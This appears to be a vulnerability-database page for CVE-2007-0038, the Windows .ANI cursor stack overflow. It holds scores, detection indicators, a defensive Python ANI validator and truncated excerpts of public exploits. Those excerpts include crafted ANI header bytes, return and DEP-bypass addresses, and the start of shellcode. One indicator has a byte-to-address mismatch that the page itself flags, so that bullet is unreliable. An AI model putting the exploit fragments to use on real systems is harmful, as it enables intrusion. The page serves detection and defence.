CVE-2007-0038
Published 2007-03-30
Priority P273 · critical · CVSS 2.0 base score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 72.88% (99.4th percentile)
Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765; if so, then CVE-2007-0038 should be preferred.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | ie | — | — |
| microsoft | internet_explorer | <= 6 | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCs (extracted from sources)
RIFF/ACON header byte sequences seen in the indexed samples ("RIFF", file length, "ACON", "anih"):
- 52 49 46 46 08 4D 00 00 41 43 4F 4E 61 6E 69 68
- 52 49 46 46 00 04 00 00 41 43 4F 4E 61 6E 69 68
- 52 49 46 46 13 03 00 00 41 43 4F 4E 61 6E 69 68
- Exploit delivery via an HTML page whose CSS cursor property points to a remote .ANI file; detect HTTP responses serving .ANI files with Content-Type application/octetstream alongside HTML pages referencing cursor URLs.
- Exploit HTML embeds the malicious ANI via CSS: '* {CURSOR: url("poc.ani")}'. Monitor for HTML pages with wildcard CSS cursor rules pointing to .ani files.
- Return address 0x7c801aed (JMP ESP in ntdll.dll) used at buffer offset 168 in the crafted ANI file for Windows XP SP2; look for the 4-byte sequence ED 1E 94 7C at offset 168 in ANI files. (Note that ED 1E 94 7C read little-endian is 0x7c941eed, not 0x7c801aed; confirm the address against the source before building a signature on either value.)
- Return address 0x7c801a7b (CALL ESI in kernel32.dll) used at buffer offset 168 in the crafted ANI file for Windows XP SP2; look for the byte sequence 7B 1A 80 7C at offset 168 in ANI files.
- The exploit targets Windows XP SP2 with a DEP bypass using ret2libc: a kernel32.dll gadget at 0x7C8024D6 and msvcrt.dll system() at 0x77C293C7; detect these addresses in ANI file payloads.
- The shellcode uses windows/shell_reverse_tcp connecting back to the attacker; monitor for outbound TCP connections from browser/explorer processes shortly after ANI file processing.
- ANI files with the 'anih' chunk size field set to 0xFFFF (\xff\xff\x00\x00) are malformed and indicative of exploit attempts; validate the anih chunk size in ANI file parsers.
- The exploit targets multiple Windows versions and DLL base addresses; ROP/return addresses are ASLR-sensitive and vary by OS language/SP version. Hardcoded addresses in exploits are only valid for the specific DLL versions listed.
- CVE-2007-1765 may be a duplicate of CVE-2007-0038; treat both identifiers as referring to the same ANI stack overflow vulnerability.
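An added example of the check the last two IOC bullets call for (written here for this page, not taken from any indexed exploit or tool): a small Python walker over the RIFF chunk structure of a .ANI that flags anih chunks whose declared size is not the 36-byte ANIHEADER, reports any chunk that claims more bytes than remain in its enclosing list, and counts anih chunks, since the overflow is reached through the second one. The two sample files are constructed inline; ANIH_SIZE and all helper names are this example's own.

```python
import struct
from typing import Iterator, List, Optional, Tuple

# sizeof(ANIHEADER): cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, jifRate, flags
ANIH_SIZE = 36


def iter_chunks(data: bytes, start: int, end: int) -> Iterator[Tuple[str, int, int, int]]:
    """Yield (fourcc, declared_size, data_offset, header_offset) for each chunk in data[start:end].

    The declared size is reported untouched so the caller can judge it; a size that
    overshoots `end` simply ends the walk, which is exactly the value a trusting
    parser would hand to memcpy."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4].decode("ascii", errors="replace")
        (size,) = struct.unpack_from("<I", data, pos + 4)
        yield fourcc, size, pos + 8, pos
        pos += 8 + size + (size & 1)  # RIFF chunk bodies are padded to an even length


def check_ani(data: bytes) -> List[str]:
    """Return a list of findings; an empty list means the anih structure looks sane."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON animated cursor"]
    findings: List[str] = []
    (riff_size,) = struct.unpack_from("<I", data, 4)
    if riff_size + 8 != len(data):
        findings.append(f"RIFF size {riff_size} disagrees with file length {len(data)}")
    anih_count = 0
    regions = [(12, len(data))]  # (start, end) of chunk lists still to walk; LIST bodies get pushed
    while regions:
        start, end = regions.pop()
        for fourcc, size, off, hdr in iter_chunks(data, start, end):
            truncated = off + size > end
            if truncated:
                findings.append(f"chunk {fourcc!r} at 0x{hdr:x} declares {size} bytes, only {end - off} remain")
            if fourcc == "anih":
                anih_count += 1
                if size != ANIH_SIZE:
                    findings.append(f"anih #{anih_count} at 0x{hdr:x}: chunk size {size} != {ANIH_SIZE}")
                elif not truncated and struct.unpack_from("<I", data, off)[0] != ANIH_SIZE:
                    findings.append(f"anih #{anih_count} at 0x{hdr:x}: cbSize field != {ANIH_SIZE}")
            elif fourcc == "LIST" and not truncated and size >= 4:
                regions.append((off + 4, off + size))  # skip the 4-byte list type, walk sub-chunks
    if anih_count == 0:
        findings.append("no anih chunk")
    elif anih_count > 1:
        findings.append(f"{anih_count} anih chunks present; the overflow is reached through the second")
    return findings


def chunk(fourcc: bytes, payload: bytes, declared: Optional[int] = None) -> bytes:
    """Build a RIFF chunk; `declared` lets a sample lie about its length the way the exploit files do."""
    size = len(payload) if declared is None else declared
    return fourcc + struct.pack("<I", size) + payload + (b"\x00" if len(payload) & 1 else b"")


def riff_acon(body: bytes) -> bytes:
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"ACON" + body


# Constructed samples (not taken from any exploit): a minimal well-formed cursor, and one that
# carries a second anih chunk whose size field is 0xFFFF, the malformation the IOC above describes.
ANIH_OK = struct.pack("<9I", ANIH_SIZE, 1, 1, 0, 0, 0, 0, 10, 1)
GOOD_ANI = riff_acon(chunk(b"anih", ANIH_OK) + chunk(b"LIST", b"fram" + chunk(b"icon", b"\x00" * 22)))
BAD_ANI = riff_acon(chunk(b"anih", ANIH_OK) + chunk(b"anih", b"A" * ANIH_SIZE, declared=0xFFFF))

if __name__ == "__main__":
    for name, sample in (("good", GOOD_ANI), ("bad", BAD_ANI)):
        print(name, check_ani(sample) or ["ok"])
```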
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 7.5 | HIGH | — |
GHSA
CVE-2007-0038 [HIGH] · CWE-119 · GHSA-p2h6-rq92-jmvq: Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code
ghsa_unreviewed · 2022-05-01 · CVSS 7.5
GHSA
CVE-2007-1765 [HIGH] · GHSA-f56g-48jx-gg6q: Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (
ghsa_unreviewed · 2022-05-01 · CVSS 7.5
Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.
VulnCheck
CVE-2007-1765 [HIGH] · Microsoft Windows Cursor, Animated Cursor, and Icon Processing Vulnerability
vulncheck · 2007 · CVSS 7.5
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://archive.f-
VulnCheck
CVE-2007-0038 [HIGH] · Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck · 2007 · CVSS 7.5
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product i
No detection rules found.
Exploit-DB
CVE-2007-1765 · Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)
exploitdb · 2010-09-20
---
##
# $Id: ms07_017_ani_loadimage_chunksize.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function of USER32.dll. The flaw is triggered
through Outlook Express by using the CURSOR style sheet
directive to load a malicious .ANI file.
Th
Exploit-DB
CVE-2007-0038 · Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)
exploitdb · 2010-08-12
---
##
# $Id: ms07_017_ani_loadimage_chunksize.rb 9984 2010-08-12 16:56:41Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function in USER32.dll. The flaw can be triggered through
Internet Explorer 6 and 7 by using the CURSOR style sheet directive
to load a malicious .AN
Exploit-DB
CVE-2007-0038 · Microsoft Windows - Animated Cursor Stack Overflow
exploitdb · 2007-06-07
---
#!/usr/bin/env python
#
# $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $
#
# Windows Animated Cursor Stack Overflow Exploit
# Copyright 2007 Ramon de Carvalho Valle ,
# RISE Security
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General P
Exploit-DB
CVE-2007-1215 · Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
exploitdb · 2007-04-26
---
MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip)
# milw0rm.com [2007-04-26]
Exploit-DB
CVE-2007-1215 · Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
exploitdb · 2007-04-17
---
/*
GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
Coded by Lionel d'Hauenens
http://www.labo-asso.com
Development:
Dev-C++ 4.9.9.2
Linked with /lib/libgdi32.a
References:
http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://www.milw0rm.com/exploits/3688
http://ivanlef0u.free.fr/?p=41
March 16, 2007
*/
#include
#include
#include
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation
} SECTION_INFORMATION_CLASS;
typedef struct _SECTION_BASIC_INFORMATION {
ULONG Base;
ULONG Attributes;
LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION;
typedef struct _GDI_TABLE_ENTRY
{
PVOID pKernelInfo;
WOR
Exploit-DB
CVE-2007-0038 · Microsoft Windows - Animated Cursor '.ani' Local Overflow
exploitdb · 2007-04-09
---
/*
.ANI exploit tested on Windows XP SP2 - Portuguese
Shellcode port bind 13579
JMP ESP Addr - ntdll.dll
Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna.
Exploit coded listen sauna hits
Featuring Luiz Zanardo's gigs "Minoide - \x52\x49\x46\x46\x00\x04\x00\x41" @ www.myspace.com/fuzzyproject
Breno Silva Pinto
bsilva[at]Sekure.org
*/
#include
#include
#include
unsigned char aniheader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02
Exploit-DB
CVE-2007-0038 · Microsoft Windows Explorer - '.ANI' File Denial of Service
exploitdb · 2007-04-08
---
/****************************************************************************
* MS Windows Explorer Unspecified .ANI File DoS *
* *
* *
* Another .Ani bug that freezes Explorer if you open a folder that contains *
* a crafted file. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu *
****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
unsigned char Ani_headers[] =
"\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00"
"\x03\x00
Exploit-DB
CVE-2007-1215 · Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
exploitdb · 2007-04-08
---
#define _WIN32_WINNT 0x0500
#include
#include
#include
#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")
/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the
win32k's SSDT by 0x2.
before :
lkd> dps bf998300 L 2
bf998300 bf934921 win32k!NtGdiAbortDoc
bf998304 bf94648d win32k!NtGdiAbortPath
after :
lkd> dps bf998300 L 2
bf998300 00000002
bf998304 bf94648d win32k!NtGdiAbortPath
win32k.sys bDeleteBrush (called by DeleteObject)
mov esi, [edx] ;esi=pKernelInfo
cmp
Exploit-DB
CVE-2007-1765 [CRITICAL] · Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)
exploitdb · 2007-04-03 · CVSS 9.3
---
/*
* version 0.5
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/
Exploit-DB
CVE-2007-0038 · Microsoft Windows - Animated Cursor '.ani' Universal Generator
exploitdb · 2007-04-03
---
#--------------------------------------------------------------------------------
# Info: .ANI (RIFF Cursors) 2007 universal exploit generator
# Tested on MS Internet Explorer 6.x-7.x, Windows XP SP2, Windows Vista
# Author: Yag Kohha
# 10x`n`Gr33tz 2:
# Jamikazu, Skylined (pretty good t-short on BH07 Europe - L00k like skylined, skylined, skylined)
# H.D. Moor and metasploit project
# Kumar Brothers (tnx for Vista patch live show at BH07 Europe),
# Alexander Sotirov (tnx for "Heap Feng Shui" live show at BH07 Europe), str0ke
# Microsoft for great coding and Amsterdam (BH07 Europe) party
#--------------------------------------------------------------------------------
https://gitlab.com/exploit-database/exploitdb-bin-spl
Exploit-DB
CVE-2007-0038 · Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow
exploitdb · 2007-04-02
---
/***************************************************************************
* MS Windows .ANI File Local Buffer Overflow *
* *
* *
* Credits go to Trirat Puttaraksa cause his PoC inspired this source. *
* devcode's exploit didnt work for me, so I made my own. *
* This exploit launches calc.exe on a lot of app (Word, Winamp, etc...). * *
* Turn off DEP to get it work on Explorer. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu *
***************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9
Exploit-DB
CVE-2007-1765 · Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)
exploitdb · 2007-04-01
---
Microsoft ANI Buffer Overflow Exploit
Author: Trirat Puttaraksa
http://sf-freedom.blogspot.com
Tested on: Windows XP SP2 fully patched + IE 6 SP2
For educational purpose only
There are many confuses about this vulnerability. Someone said that this could
not be exploited in XP SP2 - that's wrong. I provide this exploit because I
wanna to tell these people that they are in danger.
This exploit will call calc.exe (shellcode fome metasploit win32_exec
CMD=calc.exe EXITFUNC=process).
P.S. I do not include the source code for generate the .ani file because of
its damage. However, if you reverse engineer .ani file, you will know how
could I produce this exploit in 10 minutes.
I will describe this vulnerability and how t
Exploit-DB
CVE-2007-1765 · Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
exploitdb · 2007-04-01
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day) (Version3)
Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)
Update: It also bypass eeye security ani patch!
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploi
Exploit-DB
CVE-2007-1765 · Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
exploitdb · 2007-04-01
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day)
Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.
Exploit-DB
CVE-2007-1765 [CRITICAL] · Microsoft Windows - Animated Cursor '.ani' Local Stack Overflow
exploitdb · 2007-03-31 · CVSS 9.3
---
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable s
Exploit-DB
CVE-2007-0816 · CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
exploitdb · 2007-02-01
---
#!/usr/bin/ruby
#
# Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll)
#
# Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products.
#
# (7c.350): Access violation - code c0000005 (!!! second chance !!!)
# eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308
# eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
# *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve
# Backup\CATIRPC.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program
# Files\CA\BrightStor A
Metasploit
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
metasploit
This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.
Metasploit
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
metasploit
This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0470.html
- http://secunia.com/advisories/24659
- http://securityreason.com/securityalert/2542
- http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp
- http://www.kb.cert.org/vuls/id/191609
- http://www.osvdb.org/33629
- http://www.securityfocus.com/archive/1/464269/100/0/threaded
- http://www.securityfocus.com/archive/1/464339/100/0/threaded
- http://www.securityfocus.com/archive/1/464340/100/0/threaded
- http://www.securityfocus.com/archive/1/464342/100/0/threaded
- http://www.securityfocus.com/archive/1/464459/100/100/threaded
- http://www.securityfocus.com/archive/1/464460/100/100/threaded
- http://www.securityfocus.com/archive/1/466186/100/200/threaded
- http://www.us-cert.gov/cas/techalerts/TA07-089A.html
- http://www.us-cert.gov/cas/techalerts/TA07-093A.html
- http://www.us-cert.gov/cas/techalerts/TA07-100A.html
- http://www.vupen.com/english/advisories/2007/1215
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017
- https://exchange.xforce.ibmcloud.com/vulnerabilities/33301
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1854